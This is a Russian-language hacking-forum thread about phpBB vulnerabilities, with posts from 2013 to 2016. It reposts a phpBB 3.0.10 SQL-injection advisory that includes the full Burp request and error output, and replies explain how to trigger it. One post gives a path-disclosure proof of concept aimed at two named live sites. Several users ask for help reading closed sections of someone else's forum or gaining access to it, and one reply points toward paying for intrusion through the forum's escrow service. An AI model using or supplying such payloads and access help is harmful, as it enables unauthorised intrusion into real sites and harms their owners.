HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #101  
Старый 20.05.2013, 15:26
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от neomag06  
neomag06 said:
BigBear
, Спасибо большое за ответ!
Доступ к форуму только пользовательский, соответственно залезть в БД не могу, поэтому этот вариант не подходит.
А вот на заказ заказать - это выход. Я видел на этом форуме несколько таких предложений, но их авторы не отзываются, а их почты не работают...
Может подскажете к кому обратиться или какую программу использовать для моей цели.
Спасибо.
Попробуйте написать тему здесь. Не забудьте про сумму оплаты.

Ну и если хотите получить свой продукт в целостности и сохранности - советую пользоваться сервисом Гарантов Античата.
 
Ответить с цитированием

  #102  
Старый 12.08.2013, 16:12
AnnaKill
Guest
Сообщений: n/a
Провел на форуме:
525

Репутация: 0
По умолчанию

Цитата:
Сообщение от FeoGrad  
FeoGrad said:
Постоянно лезет массовый спам на форум (v. 3.0.11)
...
Вопрос/ответ - не помагает. ReCaptcha так же...
Что можно сделать. Я не хакер, а просто вебмастер. Кто может помочь?
Вот ваше спасение: http://www.phpbb.com/customise/db/mod/sortables_captcha_plugin/

Спамеры всё-равно могут пройти, но уже только ручками. Робот такого не умеет. Проверено!
 
Ответить с цитированием

  #103  
Старый 02.10.2013, 00:53
KSIVIT
Guest
Сообщений: n/a
Провел на форуме:
818

Репутация: -2
По умолчанию

Уважаемые, помогите пожалуйста с эксплуатированием этого эксплойта.

------------------------------------------------------------------

Name : phpBB3 SQL Injection

------------------------------------------------------------------

Date : 27.07.2012

------------------------------------------------------------------

Site : www.phpbb.com

------------------------------------------------------------------

Version : 3.0.10

------------------------------------------------------------------

1) What is it?

This is very nice forum board. You should try it!

------------------------------------------------------------------

2) Type of bug?

SQL Injection (or SQL-info-Leak if You want).

------------------------------------------------------------------

3) Where is the bug?

Vulnerable parameter seems to be 'style' because if we set up this parameter

to 'bigger number' (for example: 111111111) we will get an error, with full SQL

statement.

*updated - dateformat is the second vulnerable parameter!

*updated - post_st is the 3rd vulnerable parameter!

*updated - another one: topic_st

4) PoC traffic from Burp:

4.1) Request :

---

POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&mode=personal HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip, deflate

Proxy-Connection: keep-alive

Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174

Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid=

Content-Type: application/x-www-form-urlencoded

Content-Length: 258

Connection: close

viewemail=1

&massemail=1

&allowpm=1

&hideonline=0

&notifypm=1

&popuppm=0

&lang=en

&style=%2b1111111111

&tz=0

&dst=0

&dateoptions=D+M+d%2C+Y+g%3Ai+a

&dateformat=D+M+d%2C+Y+g%3Ai+a

&submit=Submit

&creation_time=1343370877

&form_token=576...

---

4.2) Response:

---

HTTP/1.1 503 Service Unavailable

Date: Fri, 27 Jul 2012 06:39:06 GMT

Server: Apache/2.2.22 (Ubuntu)

X-Powered-By: PHP/5.3.10-1ubuntu3.2

Vary: Accept-Encoding

Connection: close

Content-Type: text/html

Content-Length: 2889

Return to the index page

General Error

SQL ERROR [ mysqli ]

Out of range value for column 'user_style' at row 1 [1264]

SQL

UPDATE phpbb_users

SET user_allow_pm = 1, user_allow_viewemail = 1, user_allow_massemail = 1, user_allow_viewonline = 1,

user_notify_type = '0', user_notify_pm = 1, user_options = '230271', user_dst = 0,

user_dateformat = 'D M d, Y g:i a', user_lang = 'en', user_timezone = 0, user_style = 1111111111

WHERE user_id = 2

BACKTRACE

FILE: [ROOT]/includes/db/mysqli.php

LINE: 182

CALL: dbal->sql_error()

FILE: [ROOT]/includes/ucp/ucp_prefs.php

LINE: 100

CALL: dbal_mysqli->sql_query()

FILE: [ROOT]/includes/functions_module.php

LINE: 507

CALL: ucp_prefs->main()

FILE: [ROOT]/ucp.php

LINE: 333

CALL: p_master->load_active()

Please notify the board administrator or webmaster: (...)

---

4.2 Other response (this time from post_st parameter):

---





Return to the index page



General Error

SQL ERROR [ mysqli ]

Incorrect integer value: 'javascript:alert(123123);/' for column 'user_post_show_days' at row 1 [1366]

An SQL error occurred while fetching this page.

Please contact the
 
Ответить с цитированием

  #104  
Старый 23.10.2013, 22:51
EoGeneo
Познающий
Регистрация: 29.08.2009
Сообщений: 75
Провел на форуме:
315861

Репутация: 5
Отправить сообщение для EoGeneo с помощью ICQ
По умолчанию

ага, тоже от сплойта выше, как его юзать)
 
Ответить с цитированием

  #105  
Старый 23.10.2013, 23:21
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от KSIVIT  
KSIVIT said:
Уважаемые, помогите пожалуйста с эксплуатированием этого эксплойта.
Цитата:
Сообщение от EoGeneo  
EoGeneo said:
ага, тоже от сплойта выше, как его юзать)
это не експлоит а пример уязвимости, толку от нё кроме вызова ошибки - никакого, заходишь на форум - авторизируешся, заходишь в настройки пррофиля и правишь параметры в заголовках которые указаны в примере
 
Ответить с цитированием

  #106  
Старый 12.03.2014, 06:15
Kamik
Флудер
Регистрация: 02.12.2008
Сообщений: 4,294,967,295
Провел на форуме:
689466

Репутация: 155


Отправить сообщение для Kamik с помощью ICQ
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
это не експлоит а пример уязвимости, толку от нё кроме вызова ошибки - никакого, заходишь на форум - авторизируешся, заходишь в настройки пррофиля и правишь параметры в заголовках которые указаны в примере
Попробовал проексплуатировать - не получилось. Могу дать ссыль рабочий на сайт с этой "уязвимостью" и учету для тестов.

А вообще ктонить разобрался как её правильно юзать?
 
Ответить с цитированием

  #107  
Старый 02.10.2015, 20:15
CleafJenkins
Guest
Сообщений: n/a
Провел на форуме:
510

Репутация: 0
По умолчанию

Перепробывал все что есть на первой и второй странице топика. Ничего не помогло

Цель - просто прочесть закрытые страницы, темы форума. Имеется форум на phpBB 3.0 Olympus хостинг 2х2

Комьюнити можете пожайлуста помочь, подсказать? А то я в вебе совсем не бум-бум
 
Ответить с цитированием

  #108  
Старый 16.01.2016, 18:20
Vip77
Guest
Сообщений: n/a
Провел на форуме:
46989

Репутация: 20
По умолчанию

Full path disclosure:

/privmsg.php?mode=%0A

Poc:

Код:
Code:
http://lodjiya.ru/forum/privmsg.php?mode=%0A
http://elremont.ru/forum/privmsg.php?mode=%0A
 
Ответить с цитированием

  #109  
Старый 18.02.2016, 16:01
CleafJenkins
Guest
Сообщений: n/a
Провел на форуме:
510

Репутация: 0
По умолчанию

Цитата:
Сообщение от Vip77  
Vip77 said:

Full path disclosure:
/privmsg.php?mode=%0A
Poc:
Код:
Code:
http://lodjiya.ru/forum/privmsg.php?mode=%0A
http://elremont.ru/forum/privmsg.php?mode=%0A
Что с этим делать?
 
Ответить с цитированием

  #110  
Старый 20.12.2016, 12:53
andry_flog
Guest
Сообщений: n/a
Провел на форуме:
268

Репутация: 0
По умолчанию

Кто разберется с форумом phpBB?(предположительно 3.1.8)

Нужна помощь с получением доступа
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей vBulletin] bandera Уязвимости CMS / форумов 167 17.10.2019 18:14
В ядре Linux появляется все больше уязвимостей dinar_007 Мировые новости. Обсуждения. 18 26.01.2007 16:21
Google Code Search облегчит хакерам задачу по поиску уязвимостей Lany Мировые новости. Обсуждения. 4 16.10.2006 21:38



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ